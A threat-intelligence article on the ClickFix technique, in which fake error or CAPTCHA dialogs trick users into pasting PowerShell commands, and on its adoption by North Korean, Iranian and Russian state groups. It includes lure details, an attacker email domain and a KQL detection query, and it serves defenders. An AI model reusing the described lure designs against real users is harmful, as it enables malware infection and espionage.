Kimsuky
APT28
State-backed hackers from North Korea, Iran, and Russia exploit ClickFix social ...
ClickFix, a deceptive social engineering tactic originally used by cybercriminals, has now been adopted by multiple state-sponsored threat actors from North Korea, Iran, and Russia for espionage operations. This comprehensive analysis examines how this technique works, why it’s effective, and how various threat actors implement it in their campaigns.
## Evolution and Mechanics of ClickFix
ClickFix is a sophisticated social engineering technique that leverages dialogue boxes containing fake error messages to trick users into copying, pasting, and running malicious PowerShell commands on their own devices. Initially observed in early 2024 in campaigns from initial access broker TA571 and the ClearFake threat cluster, ClickFix has since grown dramatically in popularity across the threat landscape.
The technique operates through a cleverly designed psychological trap. When users visit a malicious website (often via phishing emails or malvertising), they're presented with a fabricated error message that claims a document cannot be opened or a download has failed. The dialogue box then provides what appears to be a helpful solution, typically instructions to copy and paste a command into PowerShell or the Windows Run dialog, that will supposedly fix the issue[1]. Once executed, these commands download and run malware that gives attackers access to the victim's system.
What makes ClickFix particularly insidious is how it preys on people’s natural desire to be helpful and independent. By providing both a problem and an apparent solution, attackers make victims feel empowered to "fix" the issue themselves without involving IT support. This approach bypasses security protections by essentially tricking users into infecting their own systems[1].
### Variants and Evolution
ClickFix has evolved since its early implementations, with several variants now in circulation:
1. **Standard Error Fix Variant**: Claims a document or file cannot be opened due to an error that needs fixing.
2. **CAPTCHA Verification Variant**: Presents a fake "Verify You Are Human" CAPTCHA check, based on an open-source toolkit named reCAPTCHA Phish that appeared on GitHub in mid-September 2024[1].
3. **Device Registration Variant**: Requires users to "register" their device by running commands to supposedly access secure content.
4. **Update Requirement Variant**: Claims a critical security update must be applied immediately.
The effectiveness of these variants has led to their rapid adoption across both cybercriminal and state-sponsored threat actors, with Proofpoint observing ClickFix campaigns leading to the deployment of various malware payloads including AsyncRAT, Danabot, DarkGate, Lumma Stealer, and NetSupport[1].
## State-Sponsored Threat Actors Embracing ClickFix
Between late 2024 and early 2025, multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia adopted ClickFix in their espionage operations[8][13][14]. This marks a significant evolution in the technique's usage, transitioning from primarily cybercriminal applications to state-sponsored espionage.
### Kimsuky (North Korea)
Between January and February 2025, the North Korean threat actor Kimsuky (also known as TA427) targeted think tanks focused on North Korea-related policy using ClickFix[8][13].
The attack began with spoofed emails in Korean, Japanese, or English purporting to be from Japanese diplomats to initiate contact and build trust with targets. After establishing rapport, the attackers sent PDF files linking to fake secure drives that prompted users to "register" their devices by copying and pasting PowerShell commands into their terminals[8][13].
Once executed, this PowerShell command fetched a second remotely hosted PowerShell script that displayed a decoy PDF document while secretly creating Visual Basic Scripts set to run every 19 minutes via scheduled tasks. These scripts ultimately downloaded and executed QuasarRAT, an open-source remote access trojan that Kimsuky has been using for at least four years[8]. The decoy document claimed to be from the Japanese Ministry of Foreign Affairs and contained questions about nuclear proliferation and policy in Northeast Asia, maintaining the illusion of legitimacy while the malware established persistence[8].
### MuddyWater (Iran)
In mid-November 2024, the Iranian threat group MuddyWater (TA450) targeted at least 39 organizations primarily in the Middle East using ClickFix[8][13][14]. Their campaign used an attacker-controlled email address (support@microsoftonlines[.]com) to send English-language phishing emails disguised as Microsoft security alerts with the subject line "Urgent Security Update Required – Immediate Action Needed"[8].
The attackers deployed ClickFix by instructing recipients to run PowerShell with administrator privileges and then copy-paste a command from the email body. This command installed Level, a remote management and monitoring (RMM) tool that the attackers could then abuse to conduct espionage and exfiltrate data[8].
While MuddyWater has historically used various RMM tools such as Atera, PDQ Connect, ScreenConnect, and SimpleHelp, this was the first observation of them using Level in Proofpoint data[8]. The campaign targeted various sectors including finance, government, health, education, and transportation across the Middle East (particularly UAE and Saudi Arabia) as well as in Canada, Germany, Switzerland, and the United States[8][13].
### UNK_RemoteRogue (Russia)
In December 2024, a suspected Russian threat actor tracked as UNK_RemoteRogue targeted two organizations associated with a major arms manufacturer[8][13][14]. The attackers sent malicious emails from compromised Zimbra servers that spoofed Microsoft Office and included links to fake documents[8].
When recipients clicked these links, they were directed to a page containing instructions in Russian along with a YouTube video tutorial demonstrating how to run PowerShell commands. Following these instructions executed JavaScript that launched PowerShell code linked to the Empire command and control (C2) framework[8][13].
This attack specifically targeted organizations in the defense industry with connections to the ongoing conflict in Ukraine[13]. UNK_RemoteRogue also shares infrastructure with phishing campaigns that targeted defense and aerospace entities to harvest webmail credentials via fake login pages[13].
### APT28 (Russia/GRU)
As early as October 2024, the Russian military intelligence group APT28 (TA422) also adopted ClickFix in their operations. Their approach involved phishing emails mimicking Google Sheets with a fake reCAPTCHA verification step[3][8].
After completing the fake verification, a pop-up guided users to run PowerShell commands that established an SSH tunnel and deployed Metasploit, providing the attackers with remote access to the victim’s systems[3][8]. This sophisticated approach enabled APT28 to maintain persistent access for intelligence gathering operations.
## Technical Analysis and Detection Opportunities
The implementation of ClickFix by various threat actors follows a similar pattern but with group-specific customizations. In most cases, the attack chain involves:
1. **Initial Access**: Typically via phishing emails or compromised websites
2. **User Deception**: Presentation of a fake error or verification requirement
3. **Command Execution**: Tricking users into running PowerShell commands
4. **Payload Delivery**: Downloading and executing the actual malware
During the payload delivery phase, PowerShell typically downloads the malware disguised as an image or benign file and then executes it on the victim's machine[2]. This activity can be detected through monitoring for suspicious PowerShell behavior, particularly instances where PowerShell drops executable files[2].
A sample KQL query for detecting this behavior would look for PowerShell processes dropping executable files:
```
DeviceFileEvents
| where InitiatingProcessFileName == "powershell.exe"
| where FileName matches regex "(?i)\\.(exe|dll|msi)$"
| project Timestamp, DeviceName, InitiatingProcessCommandLine, FileName, FolderPath, SHA256
```
This query filters for file creation events where PowerShell is the parent process and the file has an executable extension (.exe, .dll, or .msi)[2].
## Why ClickFix Remains Effective
ClickFix has become widely adopted because it effectively circumvents many traditional security controls. Rather than relying on malicious attachments or links that security tools might catch, it exploits human psychology and behavior through social engineering.
The rise of ClickFix can be attributed to improving security awareness around traditional attack vectors. As users have become more cautious about macros, suspicious attachments, and obviously malicious links, attackers have had to adapt by developing more sophisticated social engineering techniques[1].
By focusing on "hacking people's brains, emotions, and behaviors," ClickFix attackers can bypass technical security controls through authorized user actions. Additionally, the technique is effective because:
1. It provides both a problem and a solution, empowering the user. It leverages trusted interfaces (like OS dialogue boxes and PowerShell)
3. It appears to come from authoritative sources (Microsoft, Google, etc.)
4. It creates urgency that bypasses critical thinking
## Defensive Recommendations
To protect against ClickFix and similar social engineering techniques, organizations and individuals should implement several protective measures:
1. **User Education**: Specifically train users about the ClickFix technique and emphasize that legitimate software would never require copying and pasting commands from dialogue boxes.
2. **Technical Controls**: Implement PowerShell restrictions such as Constrained Language Mode and script block logging to detect suspicious PowerShell activity.
3. **Email Security**: Deploy robust email filtering solutions to identify and block phishing attempts before they reach users.
4. **Principle of Least Privilege**: Limit administrative privileges to reduce the impact of successful attacks.
5. **Behavior Monitoring**: Implement endpoint detection and response (EDR) solutions that can identify suspicious PowerShell execution patterns.
The adoption of ClickFix by state-sponsored threat actors from North Korea, Iran, and Russia represents a significant evolution in social engineering tactics used for espionage purposes. Rather than developing entirely new techniques, these groups are incorporating effective methods from the cybercriminal ecosystem into their existing toolkits[8][13].
This trend illustrates the increasing convergence between cybercriminal and state-sponsored tactics and the continued emphasis on social engineering as a primary attack vector. As security awareness continues to improve around traditional attack methods, we can expect further innovations in social engineering techniques that exploit human psychology rather than technical vulnerabilities.
The widespread adoption of ClickFix across multiple state-sponsored groups in a relatively short timeframe demonstrates its effectiveness and suggests it will likely become even more prevalent among threat actors in the near future[8][13]. Organizations must remain vigilant and adapt their security awareness training to address these evolving threats.
